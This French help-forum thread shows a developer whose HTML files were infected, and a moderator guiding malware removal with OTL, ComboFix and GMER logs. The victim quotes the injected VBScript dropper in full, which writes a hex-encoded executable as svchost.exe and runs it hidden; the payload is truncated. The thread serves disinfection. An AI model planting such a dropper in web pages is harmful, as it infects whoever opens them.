Injection "Script VB" dans mes sources
guillaume_74
Messages postés
116
Statut
Membre
-
Malekal_morte- Messages postés 184347 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
Malekal_morte- Messages postés 184347 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
Bonjour,
Bonjour, je suis développeur dans une société, et là, je viens de m'apercevoir que mon poste est "infecté"... la cause !? Aucune idée... je ne vois pas... (pas vu de processus à proprement "suspect" mais bon... il y en a tellement que je n'ai peut être pas fait attention.
Donc, je vous explique, lors de l'appel d'un script php (qui inclut un script html)... tous les fichiers HTML se trouvant dans un répertoire "HTML" se trouve être infecté:
"
"
la ligne WriteData = "..." contient une séquence en Hexa particulièrement longue (probablement un exécutable en héxa)
Bref, j'ai ça dans tous mes scripts html ... (même dans les backups)
Si quelqu'un connait ça... on pourrait m'aider !?
merci beaucoup!
Bonjour, je suis développeur dans une société, et là, je viens de m'apercevoir que mon poste est "infecté"... la cause !? Aucune idée... je ne vois pas... (pas vu de processus à proprement "suspect" mais bon... il y en a tellement que je n'ai peut être pas fait attention.
Donc, je vous explique, lors de l'appel d'un script php (qui inclut un script html)... tous les fichiers HTML se trouvant dans un répertoire "HTML" se trouve être infecté:
"
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
"
la ligne WriteData = "..." contient une séquence en Hexa particulièrement longue (probablement un exécutable en héxa)
Bref, j'ai ça dans tous mes scripts html ... (même dans les backups)
Si quelqu'un connait ça... on pourrait m'aider !?
merci beaucoup!
A voir également:
- Injection "Script VB" dans mes sources
- Script vidéo youtube - Guide
- Vb - Télécharger - Langages
- Ghost script - Télécharger - Polices de caractères
- Mas script - Accueil - Windows
- Script cmd - Guide
24 réponses
Salut,
C'est donc dans les sources des sites qui sont sur ton poste ?
Si tu supprimes ces scripts ça revient ?
Tu as des fichiers executables malicieux dans ton site ?
* Télécharge http://www.geekstogo.com/forum/files/file/398-otl-oldtimers-list-it/ sur ton bureau.
(Sous Vista/Win7, il faut cliquer droit sur OTL et choisir Exécuter en tant qu'administrateur)
* Lance OTL
* Sous Peronnalisation, copie-colle ce qu'il y a dans le cadre ci-dessous :
netsvcs
msconfig
safebootminimal
safebootnetwork
activex
drivers32
%ALLUSERSPROFILE%\Application Data\*.exe /s
%APPDATA%\*.exe /s
%SYSTEMDRIVE%\*.exe
%systemroot%\*. /mp /s
%systemroot%\system32\*.dll /lockedfiles
%systemroot%\Tasks\*.job /lockedfiles
%systemroot%\system32\drivers\*.sys /lockedfiles
%systemroot%\System32\config\*.sav
CREATERESTOREPOINT
* Clique sur le bouton Quick Scan.
* Quand le scan est fini, utilise le site http://www.cijoint.fr/ pour me donner les deux rapports : OTL.Txt et Extras.Txt.
C'est donc dans les sources des sites qui sont sur ton poste ?
Si tu supprimes ces scripts ça revient ?
Tu as des fichiers executables malicieux dans ton site ?
* Télécharge http://www.geekstogo.com/forum/files/file/398-otl-oldtimers-list-it/ sur ton bureau.
(Sous Vista/Win7, il faut cliquer droit sur OTL et choisir Exécuter en tant qu'administrateur)
* Lance OTL
* Sous Peronnalisation, copie-colle ce qu'il y a dans le cadre ci-dessous :
netsvcs
msconfig
safebootminimal
safebootnetwork
activex
drivers32
%ALLUSERSPROFILE%\Application Data\*.exe /s
%APPDATA%\*.exe /s
%SYSTEMDRIVE%\*.exe
%systemroot%\*. /mp /s
%systemroot%\system32\*.dll /lockedfiles
%systemroot%\Tasks\*.job /lockedfiles
%systemroot%\system32\drivers\*.sys /lockedfiles
%systemroot%\System32\config\*.sav
CREATERESTOREPOINT
* Clique sur le bouton Quick Scan.
* Quand le scan est fini, utilise le site http://www.cijoint.fr/ pour me donner les deux rapports : OTL.Txt et Extras.Txt.
Mon site (intranet) est pro, pas d'exécutable "malicieux"...
Ils sont pour le moment testé en local sous wamp.
Je te fais ça tout de suite
(lors que tout s'est produit, c'est quand j'ai voulu ouvrir un fichier HTML pour tester une mise en page, par défaut, il a voulu s'ouvrir avec Chrome... mais rien ne s'est passé... (et dans notepad++, le script VB est apparut... piste !?)
Ils sont pour le moment testé en local sous wamp.
Je te fais ça tout de suite
(lors que tout s'est produit, c'est quand j'ai voulu ouvrir un fichier HTML pour tester une mise en page, par défaut, il a voulu s'ouvrir avec Chrome... mais rien ne s'est passé... (et dans notepad++, le script VB est apparut... piste !?)
Mais le code du site est partagé ou il est juste en local sur ta machine ?
Faudrait juste voir si tu vires le script, s'il revient pour voir s'il y a un processus actif sur ta machine qui le remet.
S'il est partagé, ça peux être un autre poste qui remet ça.
Enfin pour l'executable malicieux, bizarre car apparemment le but de script est de faire executer un fichier svchost.exe
Faudrait juste voir si tu vires le script, s'il revient pour voir s'il y a un processus actif sur ta machine qui le remet.
S'il est partagé, ça peux être un autre poste qui remet ça.
Enfin pour l'executable malicieux, bizarre car apparemment le but de script est de faire executer un fichier svchost.exe
J'attends que ton outils d'analyse termine, moi de ce que je comprends de ce script VB, c'est qu'il écrit un exécutable a un "emplacement" avec pour nom "svchost.exe"
le WriteData doit bien faire 5000 lignes et il écrit... (donc je ne sais pas trop, je n'ai jamais poussé le VB dans cette direction ;) )
Je te tiens au courant,
En tout cas... merci de ton aide!
(Pour l'exécutable malicieux.... c'est possible, mais je ne sais pas! ^^ )
http://www.cijoint.fr/cjlink.php?file=cj201007/cijzctD0rH.txt
et
http://www.cijoint.fr/cjlink.php?file=cj201007/cijqPzapP2.txt
le WriteData doit bien faire 5000 lignes et il écrit... (donc je ne sais pas trop, je n'ai jamais poussé le VB dans cette direction ;) )
Je te tiens au courant,
En tout cas... merci de ton aide!
(Pour l'exécutable malicieux.... c'est possible, mais je ne sais pas! ^^ )
http://www.cijoint.fr/cjlink.php?file=cj201007/cijzctD0rH.txt
et
http://www.cijoint.fr/cjlink.php?file=cj201007/cijqPzapP2.txt
Tu peux envoyer c:\Program Files\Microsoft\DesktopLayer.exe sur http://upload.malekal.com stp
il faut peut-être afficher les fichiers cachés/systèmes pour voir le fichier.
Je pense que tu sais comment on fait :)
Fais une recherche de fichiers sur QxNFBWBb.exe
et regarde si ça existe aussi.
Rise Against rules :D
il faut peut-être afficher les fichiers cachés/systèmes pour voir le fichier.
Je pense que tu sais comment on fait :)
Fais une recherche de fichiers sur QxNFBWBb.exe
et regarde si ça existe aussi.
Rise Against rules :D
Hmmm ton petit appli pour récupérer les fichiers "potentiellement" dangereux me dit que le fichier n'est pas valide... ptètre parce qu'il s'agit d'un executable (et pas une dll... si!?)
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
Ou bien parce qu'il est en cours d'utilisation.... et du coup il ne peut pas le "copier"... possible aussi, je vais redémarrer en mode sans échec
Laisse tomber, il va se charger en mode sans échec.
Fais ça :
Relance OTL.
o sous Personnalisation, copie_colle le contenu du cadre ci dessous et clic Correction, un rapport apparraitra suite à l'operation que tu conserveras sur clé usb par exemple afin d'en coller le resultat:
:OTL
O20 - HKLM Winlogon: UserInit - (c:\program files\microsoft\desktoplayer.exe) - c:\Program Files\Microsoft\DesktopLayer.exe ()
O33 - MountPoints2\{8c971931-4c76-11df-8e6d-0019213f233f}\Shell\explore\command - "" = F:\.\RECYCLER\S-7-1-48-3553146472-4282356138-744414220-0817\QxNFBWBb.exe -- [2010/07/28 09:56:10 | 000,116,224 | ---- | M] ()
O33 - MountPoints2\{8c971931-4c76-11df-8e6d-0019213f233f}\Shell\Open\command - "" = F:\.\RECYCLER\S-7-1-48-3553146472-4282356138-744414220-0817\QxNFBWBb.exe -- [2010/07/28 09:56:10 | 000,116,224 | ---- | M] ()
* redemarre le pc sous windows et poste le rapport ici
Regrade dans C:\_OTL\MovedFiles si y a pas le fichier dans un sous répertoire avec la date du jour et tu l'upload sur http://upload.malekal.com
Fais ça :
Relance OTL.
o sous Personnalisation, copie_colle le contenu du cadre ci dessous et clic Correction, un rapport apparraitra suite à l'operation que tu conserveras sur clé usb par exemple afin d'en coller le resultat:
:OTL
O20 - HKLM Winlogon: UserInit - (c:\program files\microsoft\desktoplayer.exe) - c:\Program Files\Microsoft\DesktopLayer.exe ()
O33 - MountPoints2\{8c971931-4c76-11df-8e6d-0019213f233f}\Shell\explore\command - "" = F:\.\RECYCLER\S-7-1-48-3553146472-4282356138-744414220-0817\QxNFBWBb.exe -- [2010/07/28 09:56:10 | 000,116,224 | ---- | M] ()
O33 - MountPoints2\{8c971931-4c76-11df-8e6d-0019213f233f}\Shell\Open\command - "" = F:\.\RECYCLER\S-7-1-48-3553146472-4282356138-744414220-0817\QxNFBWBb.exe -- [2010/07/28 09:56:10 | 000,116,224 | ---- | M] ()
* redemarre le pc sous windows et poste le rapport ici
Regrade dans C:\_OTL\MovedFiles si y a pas le fichier dans un sous répertoire avec la date du jour et tu l'upload sur http://upload.malekal.com
Hop, c'est fait!
==============================================>
========== OTL ==========
Registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\\UserInit:c:\program files\microsoft\desktoplayer.exe deleted successfully.
File move failed. c:\Program Files\Microsoft\DesktopLayer.exe scheduled to be moved on reboot.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{8c971931-4c76-11df-8e6d-0019213f233f}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8c971931-4c76-11df-8e6d-0019213f233f}\ not found.
F:\.\RECYCLER\S-7-1-48-3553146472-4282356138-744414220-0817\QxNFBWBb.exe moved successfully.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{8c971931-4c76-11df-8e6d-0019213f233f}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8c971931-4c76-11df-8e6d-0019213f233f}\ not found.
File F:\.\RECYCLER\S-7-1-48-3553146472-4282356138-744414220-0817\QxNFBWBb.exe not found.
OTL by OldTimer - Version 3.2.9.1 log created on 07292010_133914
Files\Folders moved on Reboot...
c:\Program Files\Microsoft\DesktopLayer.exe moved successfully.
Registry entries deleted on Reboot...
<==============================================
Je t'upload le fichier que tu veux ;)
PS: Au redémarrage de mon PC: Mon antivirus me dit avoir détecté et supprimé un "virus":
ExplorerSrv.exe (dossier WINDOWS)=> Cheval de Troie (c:/WINDOWS/Explorer.exe)
==============================================>
========== OTL ==========
Registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\\UserInit:c:\program files\microsoft\desktoplayer.exe deleted successfully.
File move failed. c:\Program Files\Microsoft\DesktopLayer.exe scheduled to be moved on reboot.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{8c971931-4c76-11df-8e6d-0019213f233f}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8c971931-4c76-11df-8e6d-0019213f233f}\ not found.
F:\.\RECYCLER\S-7-1-48-3553146472-4282356138-744414220-0817\QxNFBWBb.exe moved successfully.
Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{8c971931-4c76-11df-8e6d-0019213f233f}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8c971931-4c76-11df-8e6d-0019213f233f}\ not found.
File F:\.\RECYCLER\S-7-1-48-3553146472-4282356138-744414220-0817\QxNFBWBb.exe not found.
OTL by OldTimer - Version 3.2.9.1 log created on 07292010_133914
Files\Folders moved on Reboot...
c:\Program Files\Microsoft\DesktopLayer.exe moved successfully.
Registry entries deleted on Reboot...
<==============================================
Je t'upload le fichier que tu veux ;)
PS: Au redémarrage de mon PC: Mon antivirus me dit avoir détecté et supprimé un "virus":
ExplorerSrv.exe (dossier WINDOWS)=> Cheval de Troie (c:/WINDOWS/Explorer.exe)
http://www.virustotal.com/fr/analisis/1d00b7ed73689207252437d4aa30611ea0089d13fd31c9706d33019689edacc9-1280404213
Bizarre que ton McAfee n'est pas warn dessus.
Ca fout TDSS/Alueron ....
Sauvegarde tes documents importants.
Désactive les logiciels de protection (Antivirus, Antispywares) puis :
Télécharge Combofix sUBs : http://download.bleepingcomputer.com/sUBs/ComboFix.exe et sauvegarde le sur ton bureau et pas ailleurs!
Double-clic sur combofix, accepte la licence d'utilisation et laisse toi guider.
Eventuellement, installe la console de récupération comme cela est conseillé
Attends que combofix ait terminé, un rapport sera créé. Poste le rapport.
Si le rapport ne passe pas, envoie le sur ce site : http://www.cijoint.fr/
et donne le lien ici :)
Tu as le tutorial sur ce lien pour t'aider : https://www.bleepingcomputer.com/combofix/fr/comment-utiliser-combofix
PS : si Combofix ne se lance pas, renomme le fichier Combofix et retente.
Si pas mieux, tente en mode sans échec sans prise en charge du réseau : Redémarre en mode sans échec, pour cela, redémarre l'ordinateur, avant le logo Windows, tapote sur la touche F8, un menu va apparaître, choisis Mode sans échec et appuye sur la touche entrée du clavier.
Bizarre que ton McAfee n'est pas warn dessus.
Ca fout TDSS/Alueron ....
Sauvegarde tes documents importants.
Désactive les logiciels de protection (Antivirus, Antispywares) puis :
Télécharge Combofix sUBs : http://download.bleepingcomputer.com/sUBs/ComboFix.exe et sauvegarde le sur ton bureau et pas ailleurs!
Double-clic sur combofix, accepte la licence d'utilisation et laisse toi guider.
Eventuellement, installe la console de récupération comme cela est conseillé
Attends que combofix ait terminé, un rapport sera créé. Poste le rapport.
Si le rapport ne passe pas, envoie le sur ce site : http://www.cijoint.fr/
et donne le lien ici :)
Tu as le tutorial sur ce lien pour t'aider : https://www.bleepingcomputer.com/combofix/fr/comment-utiliser-combofix
PS : si Combofix ne se lance pas, renomme le fichier Combofix et retente.
Si pas mieux, tente en mode sans échec sans prise en charge du réseau : Redémarre en mode sans échec, pour cela, redémarre l'ordinateur, avant le logo Windows, tapote sur la touche F8, un menu va apparaître, choisis Mode sans échec et appuye sur la touche entrée du clavier.
Le rapport de virustotal ne me parle pas beaucoup (La liste que l'on voit, c'est comment est appelée l'infection selon les "antivirus" !?)
Donc ce fichier est bien infecté... c'est ça !?
Alala, j'attends que la copie de mon travail se termine pour lancer "combofix"
je te tiens au courant!
Au fait, je ne sais pas si je l'ai déjà fait... mais merci pour ton aide ;)
Donc ce fichier est bien infecté... c'est ça !?
Alala, j'attends que la copie de mon travail se termine pour lancer "combofix"
je te tiens au courant!
Au fait, je ne sais pas si je l'ai déjà fait... mais merci pour ton aide ;)
bha ouaip.
Sinon ouaip DesktopLayer.exe est un malware.
Ca lance un dropper qui installe TDSS/Alueron (un autre malware)
DesktopLayer.exe lance des instances d'Internet Explorer (embedding, tu vois pas la fenetre) qui lance des requetes sur Google.
Surement pour se faire des brousoufs via Alueron.
Parent process:
Path: C:\Program Files\Internet Explorer\iexplore.exe
PID: 4068
Information: Internet Explorer (Microsoft Corporation)
Child process:
Path: C:\Program Files\riva\1280356269.exe
Information: Win32 Cabinet Self-Extractor (Microsoft Corporation)
Command line:"C:\Program Files\riva\1280356269.exe"
On voit d'ailleurs ton répertoire riva dans ton rapport OTL.
Il doit conteinr le dropper avec la suite de chiffre.
Tu peux le virer.
[2010/07/29 09:45:43 | 000,000,000 | ---D | C] -- C:\Documents and Settings\NetworkService\Application Data\Macromedia
[2010/07/29 08:55:57 | 000,000,000 | ---D | C] -- C:\Program Files\riva
Rise Against rules :D
Sinon ouaip DesktopLayer.exe est un malware.
Ca lance un dropper qui installe TDSS/Alueron (un autre malware)
DesktopLayer.exe lance des instances d'Internet Explorer (embedding, tu vois pas la fenetre) qui lance des requetes sur Google.
Surement pour se faire des brousoufs via Alueron.
Parent process:
Path: C:\Program Files\Internet Explorer\iexplore.exe
PID: 4068
Information: Internet Explorer (Microsoft Corporation)
Child process:
Path: C:\Program Files\riva\1280356269.exe
Information: Win32 Cabinet Self-Extractor (Microsoft Corporation)
Command line:"C:\Program Files\riva\1280356269.exe"
On voit d'ailleurs ton répertoire riva dans ton rapport OTL.
Il doit conteinr le dropper avec la suite de chiffre.
Tu peux le virer.
[2010/07/29 09:45:43 | 000,000,000 | ---D | C] -- C:\Documents and Settings\NetworkService\Application Data\Macromedia
[2010/07/29 08:55:57 | 000,000,000 | ---D | C] -- C:\Program Files\riva
Rise Against rules :D
Ok, je vais voir pour ça...
en par contre, ComboFix... plantage systématique juste après "Recherche des fichiers infectés, ca va prendre 10mn...etc..."
en par contre, ComboFix... plantage systématique juste après "Recherche des fichiers infectés, ca va prendre 10mn...etc..."
Pas cool. T'as bien désactivé Mcafee ?
Tente en mode sans échec.
Si pas mieux :
Télécharge GMER à partir de ce lien : http://www.gmer.net#files - clic sur "Download EXE" et télécharge le fichier sur ton bureau.
Voir le tutorial GMER, ça peut peut-être t'aider : https://www.malekal.com/tutorial-gmer/
Désactive tes logiciels de protection (antivirus, antispyware etc) et ferme tous les programmes ouverts.
Double-clic sur le fichier GMER téléchargé.
[b]IMPORTANT:[/b] Si une alerte de ton antivirus apparaît pour le fichier gmer.sys ou gmer.exe, laisse le s'executer.
Clic sur l'onglet "rootkit"
Laisse tout coché.
Clic sur Scan
Lorsque le scan est terminé, clic sur "Copy"
Ouvre le bloc-note et clic sur le Menu Edition / Coller
Le rapport doit alors apparaître.
Enregistre le fichier sur ton bureau et copie/colle le contenu ici.
Tente en mode sans échec.
Si pas mieux :
Télécharge GMER à partir de ce lien : http://www.gmer.net#files - clic sur "Download EXE" et télécharge le fichier sur ton bureau.
Voir le tutorial GMER, ça peut peut-être t'aider : https://www.malekal.com/tutorial-gmer/
Désactive tes logiciels de protection (antivirus, antispyware etc) et ferme tous les programmes ouverts.
Double-clic sur le fichier GMER téléchargé.
[b]IMPORTANT:[/b] Si une alerte de ton antivirus apparaît pour le fichier gmer.sys ou gmer.exe, laisse le s'executer.
Clic sur l'onglet "rootkit"
Laisse tout coché.
Clic sur Scan
Lorsque le scan est terminé, clic sur "Copy"
Ouvre le bloc-note et clic sur le Menu Edition / Coller
Le rapport doit alors apparaître.
Enregistre le fichier sur ton bureau et copie/colle le contenu ici.
Pour voir si y a pas TDSS.
Coche les cases à droite sur GMER comme sur ce post : https://forum.malekal.com/viewtopic.php?t=22604&start=
sinon ça va prendre 3 plombes le scan, il va scanner les fichiers et le registre.
Coche les cases à droite sur GMER comme sur ce post : https://forum.malekal.com/viewtopic.php?t=22604&start=
sinon ça va prendre 3 plombes le scan, il va scanner les fichiers et le registre.
